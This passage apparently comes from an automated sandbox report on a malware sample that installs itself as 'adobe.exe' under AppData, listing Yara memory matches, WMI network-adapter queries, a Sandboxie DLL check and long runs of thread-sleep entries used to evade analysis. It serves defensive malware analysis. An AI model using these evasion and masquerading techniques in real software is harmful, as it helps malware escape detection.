                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: x4l3iVpFSc.exe PID: 6572, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7744, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7832, type: MEMORYSTR
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: x4l3iVpFSc.exe, 00000000.00000002.1460625473.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.1893124137.0000000002901000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.1982245399.0000000002FED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeMemory allocated: 2760000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeMemory allocated: 29E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeMemory allocated: 2760000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeMemory allocated: 3140000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeMemory allocated: 3300000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeMemory allocated: 5300000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: FA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2900000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 4900000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 13C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2F70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 13C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: E90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2A90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 4A90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 14D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2FC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 599563Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 599110Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 598985Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 598860Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 598735Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 598110Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 597860Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 597735Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 597610Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 597485Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 597360Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 597235Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 597110Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 596985Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 596860Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 596735Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 596610Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 596485Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 596360Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 596201Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 596093Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 595971Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 595844Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 595499Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 595016Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 594891Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 594781Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 594672Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 594563Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 594453Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 594344Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 594219Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 594110Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 593985Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 593860Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 593735Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 593610Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 593485Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeThread delayed: delay time: 593360Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599642Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599494Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599372Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599221Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599047Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598905Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598689Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598559Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598449Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598338Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598201Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598094Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597984Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597875Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597766Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597656Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597547Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597437Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597218Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597109Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596887Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596781Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596670Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596562Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596344Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596234Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596125Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596015Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595864Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595682Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595449Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595304Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595200Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594822Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594693Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594576Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594432Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594328Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599123Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599016Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598624Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598428Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598297Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598117Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598009Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597886Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597765Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597639Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597502Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597375Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597266Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596938Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596719Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596609Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596500Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596391Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596281Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596172Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596063Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595938Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595813Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595688Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595469Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595344Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595234Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595061Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594844Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594511Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594121Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593998Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593890Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593781Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593672Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593562Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593453Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593344Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeWindow / User API: threadDelayed 7592Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exeWindow / User API: threadDelayed 2195Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 4110Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 3380Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 5762Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow / User API: threadDelayed 4066Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -599891s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7624Thread sleep count: 7592 > 30Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7624Thread sleep count: 2195 > 30Jump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -599781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -599672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -599563s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -599453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -599344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -599219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -599110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -598985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -598860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -598735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -598610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -598485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -598360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -598235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -598110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -597985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -597860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -597735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -597610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -597485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -597360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -597235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -597110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -596985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -596860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -596735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -596610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -596485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -596360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -596201s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -596093s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -595971s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -595844s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -595499s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -595016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -594891s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -594781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -594672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -594563s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -594453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -594344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -594219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -594110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -593985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -593860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -593735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -593610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -593485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\x4l3iVpFSc.exe TID: 7620Thread sleep time: -593360s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8100Thread sleep count: 4110 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -599891s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8100Thread sleep count: 3380 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -599766s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -599642s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -599494s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -599372s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -599221s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -599047s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -598905s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -598689s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 8096Thread sleep time: -598559s >= -30000sJump to behavior
